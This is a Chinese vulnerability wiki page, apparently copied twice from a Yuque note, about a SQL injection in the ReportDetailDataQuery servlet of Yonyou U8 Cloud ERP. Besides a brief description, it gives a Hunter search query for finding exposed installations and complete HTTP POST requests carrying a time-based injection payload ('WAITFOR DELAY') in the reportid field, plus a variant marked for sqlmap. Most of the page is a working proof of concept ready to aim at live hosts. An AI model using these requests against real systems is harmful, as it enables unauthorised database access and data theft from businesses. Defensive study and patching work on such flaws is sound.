fofamini-wiki

登录白背景

源码

用友U8 Cloud ReportDetailDataQuery存在SQL注入漏洞

一、漏洞简介

用友U8 Cloud是用友公司推出的企业上云数字化平台，为成长型和创新型企业提供全面的云ERP解决方案。然而，该平台中存在一个安全漏洞，涉及ReportDetailDataQuery接口对用户输入参数缺乏有效过滤，可能导致SQL注入攻击。攻击者可通过此漏洞未经授权地访问数据库，造成潜在的信息泄露风险。建议尽快修复漏洞，强化输入验证，提升系统安全性。

二、影响版本

用友U8 Cloud

三、资产测绘

hunterapp.name="用友 U8 Cloud"

登录页面

四、漏洞复现

POST /servlet/~iufo/nc.itf.iufo.mobilereport.data.ReportDetailDataQuery HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 335
Accept-Encoding: gzip, deflate
Connection: close
SL-CE-SUID: 126

{"usercode":1,"reportid":"';WAITFOR DELAY '0:0:5'--"}

sqlmap

POST /servlet/~iufo/nc.itf.iufo.mobilereport.data.ReportDetailDataQuery HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 335
Accept-Encoding: gzip, deflate
Connection: close
SL-CE-SUID: 126

{"usercode":1,"reportid":"*"}

原文: https://www.yuque.com/xiaokp7/ocvun2/nik54chiete8u5r6

# 用友U8 Cloud ReportDetailDataQuery存在SQL注入漏洞

# 一、漏洞简介
用友U8 Cloud是用友公司推出的企业上云数字化平台，为成长型和创新型企业提供全面的云ERP解决方案。然而，该平台中存在一个安全漏洞，涉及ReportDetailDataQuery接口对用户输入参数缺乏有效过滤，可能导致SQL注入攻击。攻击者可通过此漏洞未经授权地访问数据库，造成潜在的信息泄露风险。建议尽快修复漏洞，强化输入验证，提升系统安全性。

# 二、影响版本

- 用友U8 Cloud

# 三、资产测绘

- hunter`app.name="用友 U8 Cloud"`

![image.png](./img/7M8tUXUD8ZMQpes1/1692444362525-121bbed1-c72d-4cad-99db-3e18509417c1-843866.png)

- 登录页面

![image.png](./img/7M8tUXUD8ZMQpes1/1692444381978-7d4ed5bf-a153-47e5-88e6-4dd97953e976-710891.png)

# 四、漏洞复现
```java
POST /servlet/~iufo/nc.itf.iufo.mobilereport.data.ReportDetailDataQuery HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 335
Accept-Encoding: gzip, deflate
Connection: close
SL-CE-SUID: 126

{"usercode":1,"reportid":"';WAITFOR DELAY '0:0:5'--"}
```
![image.png](./img/7M8tUXUD8ZMQpes1/1703400823140-7a8f1b7a-8c88-4153-b2e9-947d195ae9a2-452449.png)
sqlmap
```java
POST /servlet/~iufo/nc.itf.iufo.mobilereport.data.ReportDetailDataQuery HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 335
Accept-Encoding: gzip, deflate
Connection: close
SL-CE-SUID: 126

{"usercode":1,"reportid":"*"}
```
![image.png](./img/7M8tUXUD8ZMQpes1/1703400849392-1ab97b9b-49c7-45c7-87ec-6413f9ed7b10-184625.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/nik54chiete8u5r6>